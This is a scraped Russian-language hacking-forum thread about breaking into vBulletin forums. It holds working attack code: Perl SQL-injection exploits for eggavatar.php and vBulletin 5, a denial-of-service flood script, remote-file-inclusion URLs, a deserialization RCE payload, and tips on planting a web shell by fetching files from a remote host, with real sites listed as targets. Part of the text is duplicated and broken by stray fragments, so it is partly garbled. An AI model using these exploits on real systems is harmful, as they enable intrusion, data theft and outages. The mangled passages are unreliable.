/includes/api/6/newthread_newthread.php
/includes/block/blogentries.php
/includes/block/cmsarticles.php
/includes/block/html.php
/includes/block/newposts.php
/includes/block/sgdiscussions.php
/includes/block/tagcloud.php
/includes/block/threads.php
/forumrunner/include/subscriptions.php
/forumrunner/include/search_forum.php
/forumrunner/include/profile.php
/forumrunner/include/post.php
/forumrunner/include/pms.php
/forumrunner/include/online.php
/forumrunner/include/moderation.php
/forumrunner/include/misc.php
/forumrunner/include/login.php
/forumrunner/include/get_thread.php
/forumrunner/include/get_forum.php
/forumrunner/include/cms.php
/forumrunner/include/attach.php
/forumrunner/include/announcement.php
/forumrunner/include/album.php
/forumrunner/support/vbulletin_methods.php
/forumrunner/support/stringparser_bbcode.class.php
/forumrunner/support/utils.php
/forumrunner/support/other_methods.php
/packages/skimlinks/hooks/postbit_display_complete.php
/packages/skimlinks/hooks/showthread_complete.php
/packages/skimlinks/hooks/userdata_start.php

//...Leaked bY beBoss..//

BigBear 23.12.2012 10:16

Цитата:

Сообщение от po[w
er"]
po[w]er said:
Нужна помощь в заливке шелла.
Создаю плагин с кодом шелла wso, пихаю его в faq_complete, но при выполнении какой-то команды или переходе в папку выдаёт:
Your submission could not be processed because a security token was missing.
If this occurred unexpectedly, please inform the administrator and describe the action you performed before you received this error.
как можно решить эту проблему? Вариант с system($_GET["cmd"]); не подходит тк все функции для выполнения системных команд отключены.

Сталкивался с такой фигнёй. Выкрутился тем, что изменил плагин на один из индексных при заходе на форум, а в качестве php кода указал не получение команд через GPC, а копирование файла с удалённого хоста в нужную папку.

Unknown 20.01.2013 08:45

Цитата:

Сообщение от nicols
Есть что на vBulletin® Version 3.8.7 ?

На ветке vBulletin 3.8.x присутствует SQL инъекция в файле eggavatar.php, он находится в корневой директории сайта. Если при обращении к site/eggavatar.php сайт выдал не 404 Not Found, то воспользуйтесь сплоитом:

[PHP]
[COLOR="#000000"]#!/usr/bin/env perl

useLWP::UserAgent;

sub banner{

print
"###################################\n";

print
"############ DSecurity ############\n";

print
"###################################\n";

print
"# Email:dsecurity.vn[at]gmail.com #\n";

print
"###################################\n";

}

if(@
ARGVnew();

$ua->agent("DSecurity");

$ua->cookie_jar({});

sub login(@){

my $username=shift;

my $password=shift;

my $req=HTTP::Request->new(POST=>$ARGV[0].'/login.php?do=login');

$req->content_type('application/x-www-form-urlencoded');

$req->content("vb_login_username=$username&vb_login_passwor=$password&s=&securitytoken=1299342473-6b3ca11fdfd9f8e39a9bc69638bf32293bce4961&do=login& vb_login_md5password=&vb_login_md5password_utf=");

my $res=$ua->request($req);

}

sub v_request{

#Declare

$print=$_[0];

$select=$_[1];

$from=$_[2];

$where=$_[3];

$limit=$_[4];

$sleep=$ARGV[4];

if (
$from eq'') {$from='information_schema.tables';}

if (
$where eq'') {$where='1';}

if (
$limit eq'') {$limit='0';}

if (
$sleep eq'') {$sleep='10';}



# Create a request

my $req=HTTP::Request->new(POST=>$ARGV[0].'/eggavatar.php');

$req->content_type('application/x-www-form-urlencoded');

$req->content('do=addegg&securitytoken=1299342473-6b3ca11fdfd9f8e39a9bc69638bf32293bce4961&eggavatar =1'."' and (SELECT 1 FROM(SELECT COUNT(*),CONCAT( (select$selectfrom$fromWHERE$wherelimit$limit,1),FLOOR(RAND(1)*3))foo FROM information_schema .tables GROUP BY foo)a)-- -'&uid=1&pid=1");

# Pass request to the user agent and get a response back

my $res=$ua->request($req);

#print $res->content;

if($res->content=~ /(MySQL Error)(.*?)'(.*?)0'(.*)/)

{
$test= $3};

sleep($sleep);

return
$print.$test."\n";

}

&
banner;

print
"\n############################################### # ############################################# ##### ###########\n";

print
"# EggAvatar for vBulletin 3.8.x SQL Injecti on Vulnerability #\n";

print
"# Date:06-03-2011 #\n";

print
"# Author: DSecurity #\n";

print
"# Software Link: http://www.vbteam.info/vb-3-8-x-addons-and-template-modifications/19079-tk-egg-avatar.html #\n";

print
"# Version: 2.3.2 #\n";

print
"# Tested on: vBulletin 3.8.0 #\n";

print
"################################################# # ############################################# ##### #########\n";



#login

login($ARGV[1],$ARGV[2]);

#Foot print

printv_request('MySQL version: ','@@version');

print
v_request('Data dir: ','@@datadir');

print
v_request('User: ','user()');

print
v_request('Database: ','database()');

#Get user

for($i=1;$i[COLOR="#007700"]

warhamer2012 10.02.2013 17:44

Мужики, подскажите насчет vbulletin 4.0.2 Remote File Inclusion

Кто-то пробовал? Все облазил-нашел только следующее

# Exploit :

#

# http://www.site.com/path/includes/class_block.php?classfile=[shell code]

#

# http://www.site.com/path/vb/vb.php?filename=[shell code]

#

# http://www.site.com/path/packages/vbattach/attach.php?include_file=[shell code]


Но не прокатывает на ни на цели, ни на локалке. Что я делаю не так? Или это фейк???

Unknown 27.02.2013 15:12

Недавно искал новый сплоит под vBulletin.

Забрел на сайт 1337day.com и меня заинтересовал следующий топик 0дея:

Код:

http://1337day.com/exploit/description/20417
Описание гласило:

Цитата:

Сообщение от None
Код:

Access to Admincp and Customer area.

The target forum need to have its install directory available for this exploit to work. /forum/install/upgrade.php

----------------------------------------
Please Enter Your Customer Number
This is the number with which you log in to the vBulletin.com Members' Area
----------------------------------------

The result is MD5,
You will need to bruteforce it to get the 12 char uppercase customer number.
Then you can re-install the forum and access admin area.

Заплатив автору 150$ я получил следующий эксплоит:
vBulletin x.x.x Customer Area 0day
htaccess install dir or delete install dir.
__________________________________________________ __________
# Exploit Title: vBulletin x.x.x Customer Area 0day #
# Author(s): Pixel_death, n3tw0rk, z0ne #
# Perl script coded by n0tch #
# Product: offical software #
# Software Version x.x.x #
# Product Download: http://www.vbulletin.com #
# Google Dork: intext
owered by vBulletin® #
# Demo sites;
# LIVE WORKING DEMO: go to http://vbhacks.info/install/upgrade.php follow the tutorial and decrypt the MD5#
# http://www.vbseo.com/install/upgrade.php #
# http://trove.nla.gov.au/forum/install/upgrade.php #
# http://www.xboxaddict.com/forums/install/upgrade.php #
__________________________________________________ ___________#
This all depends if the upgrade area is still on the forum files, if so you can see the customer number in MD5 by following these simply steps
1st: go to /install/upgrade.php
2nd: view source scroll down to the 300 maybe more and it should look like this #~
Код:

Unexpected Text:%1$s";
var SETUPTYPE = "upgrade";
var STEP_X_Y = "Step %1$s - %2$s";
var SERVER_NO_RESPONSE = "The server returned no response. This is probably due to a timeout setting. Please contact vBulletin Support for assistance";
//-->

As you can see var CUSTNUMBER = "38405e0bd55eec58330a6af5e960202e"; is there which can be decoded at http://d4tabase.com/forumdisplay.php?f=110 crack my hash section
then log in, reset admin pass and have fun^^
[CODE]
Auto tool script coded in perl
#!/usr/bin/perl

use LWP::UserAgent;
use HTTP::Request::Common;

system('cls');
system('title vBulletin Install Auto Exploiter');
print "\n ---------------------------------------";
print "\n vBulletin Install Auto Exploiter founded by pixel_death, n3tw0rk & z0ne\n";
print " ---------------------------------------\n";
print " + d4tabase.com -+- d4tabase.com + ";
print "\n ---------------------------------------\n";
print " coded by n0tch shoutz d4tabase crew ";
print "\n ---------------------------------------\n";

if($#ARGV == -1 or $#ARGV > 0)
{
print "\n usage: ./vBulletin.pl domain (without http://) \n\n";
exit;
}

$domain = $ARGV[0];
$install_dir = "install";
$full_domain = "http://$domain/$install_dir/upgrade.php";
chop($domain);

&search;

sub search
{
$url = $full_domain;
$lwp = LWP::UserAgent->new();
$lwp -> agent("Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8");
$request = $lwp->post($url, ["searchHash" => "Search"]);

print " Searching $domain ----\n ";
if ($request->content =~ /CUSTNUMBER = \"(.+)\";/)
{
print "Result : $1\n";
} else {
print "Hash: Hash not found!\n";
}
}
[code]

Shouts to: n0tch, shadow008

На первый взгляд все вроде-бы отлично.
Сплоит оказался не рабочим..Но не беда,быстро переделал на пхп:

Код:


А вот дальше самое интересное!
Захожу на форумы смотрю в папке инсталл фаил upgrade.php вижу в исходниках хэш.
Пробручиваю хэш получаю 12 значное число.
Ввожу в фаиле upgrade.php... форум обнавляется.. Все как в описании , но тут меня постиг первый облом.
http://i068.radikal.ru/1302/bc/3b6adca7e7cc.jpg
После установки ни один из проверенных форумов не предложил сменить пароль.
Вернулся к описанию, "Access to Admincp and Customer area".
Легче от этого не стало:
Цитата:

Сообщение от None
vbulletin.com/docs/html/main/what_is_memberarea
Цитата:
Members' Area
The Members' Area is a private part of the vBulletin.com site for registered licensed customers. The area is security protected and requires members to enter their customer number and password to again access.
The Members' Area is where you can download vBulletin releases and updates as well as access to additional documentation and resources not publically available.
The Members' Area is currently located at http://members.vbulletin.com.
http://www.vbulletin.com/docs/html/main/what_is_custnum
Цитата:
Customer Number
A customer number is a unique number allocated to everyone who purachses a vBulletin license. The customer number, along with a password is required to access the vBulletin Members' Area.

Для доступа в "Customer area" не достаточно customer number.

[/QUOTE]
" if author else f"
Цитата:

Код:

Access to Admincp and Customer area.

The target forum need to have its install directory available for this exploit to work. /forum/install/upgrade.php

----------------------------------------
Please Enter Your Customer Number
This is the number with which you log in to the vBulletin.com Members' Area
----------------------------------------

The result is MD5,
You will need to bruteforce it to get the 12 char uppercase customer number.
Then you can re-install the forum and access admin area.

Заплатив автору 150$ я получил следующий эксплоит:
vBulletin x.x.x Customer Area 0day
htaccess install dir or delete install dir.
__________________________________________________ __________
# Exploit Title: vBulletin x.x.x Customer Area 0day #
# Author(s): Pixel_death, n3tw0rk, z0ne #
# Perl script coded by n0tch #
# Product: offical software #
# Software Version x.x.x #
# Product Download: http://www.vbulletin.com #
# Google Dork: intext
owered by vBulletin® #
# Demo sites;
# LIVE WORKING DEMO: go to http://vbhacks.info/install/upgrade.php follow the tutorial and decrypt the MD5#
# http://www.vbseo.com/install/upgrade.php #
# http://trove.nla.gov.au/forum/install/upgrade.php #
# http://www.xboxaddict.com/forums/install/upgrade.php #
__________________________________________________ ___________#
This all depends if the upgrade area is still on the forum files, if so you can see the customer number in MD5 by following these simply steps
1st: go to /install/upgrade.php
2nd: view source scroll down to the 300 maybe more and it should look like this #~
Код:

Unexpected Text:%1$s";
var SETUPTYPE = "upgrade";
var STEP_X_Y = "Step %1$s - %2$s";
var SERVER_NO_RESPONSE = "The server returned no response. This is probably due to a timeout setting. Please contact vBulletin Support for assistance";
//-->

As you can see var CUSTNUMBER = "38405e0bd55eec58330a6af5e960202e"; is there which can be decoded at http://d4tabase.com/forumdisplay.php?f=110 crack my hash section
then log in, reset admin pass and have fun^^
[CODE]
Auto tool script coded in perl
#!/usr/bin/perl

use LWP::UserAgent;
use HTTP::Request::Common;

system('cls');
system('title vBulletin Install Auto Exploiter');
print "\n ---------------------------------------";
print "\n vBulletin Install Auto Exploiter founded by pixel_death, n3tw0rk & z0ne\n";
print " ---------------------------------------\n";
print " + d4tabase.com -+- d4tabase.com + ";
print "\n ---------------------------------------\n";
print " coded by n0tch shoutz d4tabase crew ";
print "\n ---------------------------------------\n";

if($#ARGV == -1 or $#ARGV > 0)
{
print "\n usage: ./vBulletin.pl domain (without http://) \n\n";
exit;
}

$domain = $ARGV[0];
$install_dir = "install";
$full_domain = "http://$domain/$install_dir/upgrade.php";
chop($domain);

&search;

sub search
{
$url = $full_domain;
$lwp = LWP::UserAgent->new();
$lwp -> agent("Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8");
$request = $lwp->post($url, ["searchHash" => "Search"]);

print " Searching $domain ----\n ";
if ($request->content =~ /CUSTNUMBER = \"(.+)\";/)
{
print "Result : $1\n";
} else {
print "Hash: Hash not found!\n";
}
}
[code]

Shouts to: n0tch, shadow008
На первый взгляд все вроде-бы отлично.
Сплоит оказался не рабочим..Но не беда,быстро переделал на пхп:

Код:


А вот дальше самое интересное!
Захожу на форумы смотрю в папке инсталл фаил upgrade.php вижу в исходниках хэш.
Пробручиваю хэш получаю 12 значное число.
Ввожу в фаиле upgrade.php... форум обнавляется.. Все как в описании , но тут меня постиг первый облом.
http://i068.radikal.ru/1302/bc/3b6adca7e7cc.jpg
После установки ни один из проверенных форумов не предложил сменить пароль.
Вернулся к описанию, "Access to Admincp and Customer area".
Легче от этого не стало:
Цитата:

Сообщение от None
vbulletin.com/docs/html/main/what_is_memberarea
Цитата:
Members' Area
The Members' Area is a private part of the vBulletin.com site for registered licensed customers. The area is security protected and requires members to enter their customer number and password to again access.
The Members' Area is where you can download vBulletin releases and updates as well as access to additional documentation and resources not publically available.
The Members' Area is currently located at http://members.vbulletin.com.
http://www.vbulletin.com/docs/html/main/what_is_custnum
Цитата:
Customer Number
A customer number is a unique number allocated to everyone who purachses a vBulletin license. The customer number, along with a password is required to access the vBulletin Members' Area.

Для доступа в "Customer area" не достаточно customer number.

[/QUOTE]

Unknown 27.02.2013 15:18

Эксплоит оказался не рабочим, но что-то делать было нужно.

Мой вгляд пал на только что обновленную булку до версии: 4.1.5

Код:

mmoru.com
Зарегистрировавшись , я обратил внимание что на самом сайте стоит движек vBuletin на котором возможно писать статьи.

Проверяя переменные наткнулся на sq-injection , как в последствии оказалось присущюю всем vbulletin 4.1.5.

Название: Уязвимость в vBulletin 4.1.5

Dork: Powered by Powered by vBulletin 4.1.5

Условия: Аккаунт на форуме. Разрешение на прикрепление файлов к сообщениям/темам (attachments)

Регистрируемся -> заходим на форум -> жмем создать тему или если стоит борд, то можно выбрать создать статью (второй вариант чаще срабатывал) -> в самом низу ищем Вложения "Управление вложениями" -> Открываем окно и в параметр "values[f]" вставляем наш SQL запрос.

Пример:

PHP код:

[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]:

[/
COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//site.com/board/newattachment.php?do=assetmanager&values[f]=-1599+or(1,2)=(select*from(select+name_const(version(),1),name_const(version(),1))a)&contenttypeid=18&poststarttime=1360663633&posthash=4f5c850593e10c5450d9e880d58a56d8&insertinline=1

[/COLOR][/COLOR

После чего видим стандартную ошибку БД форума, следовательно открываем исходный код страницы и видим:

PHP код:

[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]

[/COLOR][/COLOR

С вами были Piv8Team (priv8.ru)

Ups 28.03.2013 00:46

vBulletin 5 Beta XX SQLi 0day

Код:

#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Request::Common;
use MIME::Base64;
system $^O eq 'MSWin32' ? 'cls' : 'clear';
print "
+===================================================+
|          vBulletin 5 Beta XX SQLi 0day          |
|              Author: Orestis Kourides            |
|            Web Site: www.cyitsec.net            |
+===================================================+
";
 
if (@ARGV != 5) {
    print "\r\nUsage: perl vb5exp.pl WWW.HOST.COM VBPATH URUSER URPASS MAGICNUM\r\n";
    exit;
}
 
$host                = $ARGV[0];
$path                = $ARGV[1];
$username        = $ARGV[2];
$password        = $ARGV[3];
$magicnum        = $ARGV[4];
$encpath        = encode_base64('http://'.$host.$path);
print "[+] Logging\n";
print "[+] Username: ".$username."\n";
print "[+] Password: ".$password."\n";
print "[+] MagicNum: ".$magicnum."\n";
print "[+] " .$host.$path."auth/login\n";
my $browser = LWP::UserAgent->new;
my $cookie_jar = HTTP::Cookies->new;
my $response = $browser->post( 'http://'.$host.$path.'auth/login',
    [
                'url' => $encpath,
                'username' => $username,
                'password' => $password,
        ],
        Referer => 'http://'.$host.$path.'auth/login-form?url=http://'.$host.$path.'',
        User-Agent => 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0',
);
$browser->cookie_jar( $cookie_jar );
my $browser = LWP::UserAgent->new;
$browser->cookie_jar( $cookie_jar );
print "[+] Requesting\n";
my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
    [
                'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast(version() as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1=1',
        ],
        User-Agent => 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0',
);
$data = $response->content;
if ($data =~ /(#((\\.)|[^\\#])*#)/) { print '[+] Version: '.$1 };
print "\n";
exit 1;


Oro4imaru 20.10.2013 10:13

vBulletin® Version 4.1.5

http://www.youtube.com/watch?v=k9xe55gq2fc

wauffmannn 11.11.2013 01:10

Обход ограничений безопасности в vBulletin

Дата публикации: 10.10.2013

Дата изменения: 10.10.2013

Всего просмотров: 1104

Опасность: Высокая

Наличие исправления: Инстуркции по устранению

Количество уязвимостей: 1

CVSSv2 рейтинг: (AV:N/AC:L/Au:N/C/I/A/E:H/RL:W/RC:C) = Base:7.5/Temporal:7.1

CVE ID: Нет данных

Вектор эксплуатации: Удаленная

Воздействие: Обход ограничений безопасности

CWE ID: Нет данных

Наличие эксплоита: Активная эксплуатация уязвимости

Уязвимые продукты: vBulletin 4.x

vBulletin 5.x

Уязвимые версии: vBulletin версии 4.x, 5.x

Описание:

Уязвимость позволяет удаленному пользователю получить административный доступ к приложению.

Уязвимость существует из-за неизвестной ошибки в сценарии /install/upgrade.php. Удаленный пользователь может с помощью специально сформированного запроса создать новую административную учетную запись и получить полный контроль над приложением.

Уязвимость активно эксплуатируется в настоящее время.

URL производителя: http://www.vbulletin.com/

Решение: Способов устранения уязвимости не существует в настоящее время. В качестве временно решения производитель рекомендует удалить установочные директории /install/ или /core/install/.

Ссылки:

http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/3991423-potential-vbulletin-exploit-vbulletin-4-1-vbulletin-5

http://www.vbulletin.org/forum/showthread.php?p=2443431

где взять POC?

Konqi 11.11.2013 01:58

Цитата:

Сообщение от wauffmannn
Дата публикации: 10.10.2013
Дата изменения: 10.10.2013
Всего просмотров: 1104
Опасность: Высокая
Наличие исправления: Инстуркции по устранению
Количество уязвимостей: 1
CVSSv2 рейтинг: (AV:N/AC:L/Au:N/C
/I
/A
/E:H/RL:W/RC:C) = Base:7.5/Temporal:7.1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Обход ограничений безопасности
CWE ID: Нет данных
Наличие эксплоита: Активная эксплуатация уязвимости
Уязвимые продукты: vBulletin 4.x
vBulletin 5.x
Уязвимые версии: vBulletin версии 4.x, 5.x
Описание:
Уязвимость позволяет удаленному пользователю получить административный доступ к приложению.
Уязвимость существует из-за неизвестной ошибки в сценарии /install/upgrade.php. Удаленный пользователь может с помощью специально сформированного запроса создать новую административную учетную запись и получить полный контроль над приложением.
Уязвимость активно эксплуатируется в настоящее время.
URL производителя: http://www.vbulletin.com/
Решение: Способов устранения уязвимости не существует в настоящее время. В качестве временно решения производитель рекомендует удалить установочные директории /install/ или /core/install/.
Ссылки:
http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/3991423-potential-vbulletin-exploit-vbulletin-4-1-vbulletin-5
http://www.vbulletin.org/forum/showthread.php?p=2443431
где взять POC?

там одной булки не достаточно, нужна читалка на серваке

более подробно тут

OxoTnik 21.01.2014 23:53

Цитата:

Сообщение от ~root
Кто нибудь знает какой-нибудь способ, как посмотреть скрытые сообщения? Версия vBulletin 4.1.10

да. http://www.1337day.com/exploit/17824

BigBear 19.06.2014 09:59

Небольшая заметка о "быстром" поиске админки.

В случае, когда у Вас есть администраторский аккаунт, но нет доступа в админку, по причине "админ захотел поиграть в кошки-мышки и переименовал админку", дабы не брутить и не нагружать сервер кучей бесполезных логов, поможет следующий способ:

заходим в профиль любого пользователя (forum/member.php?u=2), видим кнопку "Edit Profile / Редактировать учётную запись". По ссылке - как раз адрес админки.

VB >= 2.8.6

Другие версии не проверял.

eman 15.11.2014 11:51

Цитата:

Сообщение от BigBear
Небольшая заметка о "быстром" поиске админки.
В случае, когда у Вас есть администраторский аккаунт, но нет доступа в админку, по причине "админ захотел поиграть в кошки-мышки и переименовал админку", дабы не брутить и не нагружать сервер кучей бесполезных логов, поможет следующий способ:
заходим в профиль любого пользователя (forum/member.php?u=2), видим кнопку "Edit Profile / Редактировать учётную запись". По ссылке - как раз адрес админки.
VB >= 2.8.6
Другие версии не проверял.

Я уже подобное писал выше, только не стоит забывать, что данный способ работает если переименованная админка прописана в config.php

Если она не прописана в конфиге то не найти.

Reset_ 23.03.2015 11:13

Залили другу через шелл такую штукуVbulletin activity Page Denial of Service,

сам не проверял кому то может пригодится

Цитата:

Сообщение от None
#!/usr/bin/perl
#
# Vbulletin activity Page Denial of Service
# Code Written By silent
# Site : Www.IrIsT.Ir - Www.IrIsT.Ir/forum - Www.IrIsT.Ir/en
# Facebook Page : https://www.facebook.com/pages/IrIsT-Hacking-Security-Researcher-Group/488307267857573
# Greats : Amir , Codex , Beni_Vanda , sajjad13and11 , Andd All IrIsT Members
#
use IO::Socket;
$host = $ARGV[0];
$path = $ARGV[1];
if(!$ARGV[1])
{
print "\n\n";
print "\t Vbulletin activity Page Denial of Service\n";
print "\t Discoverd By silent \n";
print "\t Www.IrIsT.Ir \n";
print "\t =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-\n";
print "\t [host] [path] \n";
print "\t host.com /Vbulletin/\n";
print "\t =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=\n";
exit();
}
for($i=0; $inew(Proto => "tcp", PeerAddr => $host, PeerPort => "80") or die("[-] Connection faild.\n");
$post = "show=1%1%1%1%1%1%1%1%1%1%1%&time=1%1%1%1%1%1%1%1% 1%1%1%&sortby=1%1%1%1%1%1%1%1%1%1%1%";
$pack.= "POST " .$path. "/activity.php HTTP/1.1\r\n";
$pack.= "Host: " .$host. "\r\n";
$pack.= "User-Agent: Googlebot/2.1\r\n";
$pack.= "Content-Type: application/x-www-form-urlencoded\r\n";
$pack.= "Content-Length: " .length($post). "\r\n\r\n";
$pack.= $post;
print $socket $pack;
syswrite STDOUT, "+";
}


grimnir 29.06.2015 10:04

https://github.com/rezasp/vbscan/

Black Box vBulletin Vulnerability Scanner

grimnir 09.11.2015 14:52

vBulletin 5 PreAuth RCE writeup

Цитата:

Сообщение от None
by @_cutz
vBulletin implements certain ajax API calls in /core/vb/api/, one of them is hook.php:
public function decodeArguments($arguments)
{
if ($args = @unserialize($arguments))
{
$result = '';
foreach ($args AS $varname => $value)
{
$result .= $varname;
Apart from the obvious unserialize() not much else happening there -- luckily we have in /core/vb/db/result.php:
class vB_dB_Result implements Iterator
{
...
public function rewind()
{
//no need to rerun the query if we are at the beginning of the recordset.
if ($this->bof)
{
return;
}
if ($this->recordset)
{
$this->db->free_result($this->recordset);
}
rewind() is the first function to get called when an Iterator object is accessed via foreach(). Then we have in /core/vb/database.php:
abstract class vB_Database
{
...
function free_result($queryresult)
{
$this->sql = '';
return @$this->functions['free_result']($queryresult);
}
Which gives easy RCE. Setup objects accordingly:
$ php functions['free_result'] = 'phpinfo';
}
}
class vB_dB_Result {
protected $db;
protected $recordset;
public function __construct()
{
$this->db = new vB_Database();
$this->recordset = 1;
}
}
print urlencode(serialize(new vB_dB_Result())) . "\n";
eof
O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%0 0%2A%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7 Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22 free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3 A12%3A%22%00%2A%00recordset%22%3Bi%3A1%3B%7D
Just surf to:
http://localhost/vbforum/ajax/api/hook/decodeArguments?arguments=O:12:"vB_dB_Result":2:{s :5:"�*�db";O:11:"vB_Database":1:{s:9:"function s";a:1:{s:11:"free_result";s:7:"phpinfo";}}s:12:" *�recordset";i:1;}
The fix was just replacing the unserialize() with json_decode(). Btw this bug has been sitting in vBulletin for more than three years.
-- cutz


indigo666 09.01.2016 06:35

Кто-нибудь знает уязвимости в VB 3.8.7 / 4.2.x?

user6334 10.01.2016 01:18

Цитата:

Сообщение от grimnir

vBulletin 5 PreAuth RCE writeup

у меня так выводятся только кавычки, пробовал много

grimnir 04.05.2016 19:11

https://github.com/rezasp/vbscan

обновился

Цитата:

Сообщение от None
OWASP VBScan 0.1.6 [Dennis Ritchie again]
  • Project name has been changed to "OWASP VBScan"
  • Added automatic vBulletin detection
  • Added robots.txt analyzer module
  • Added vbulletin LICENSE checker module
  • Optimized backup finder module
  • Optimized exploit check module
  • Fixed YUI 2.9.0 XSS false positive
  • Vbulletin version checker module bug fixed
  • "-h" switch not exist anymore



Время: 21:44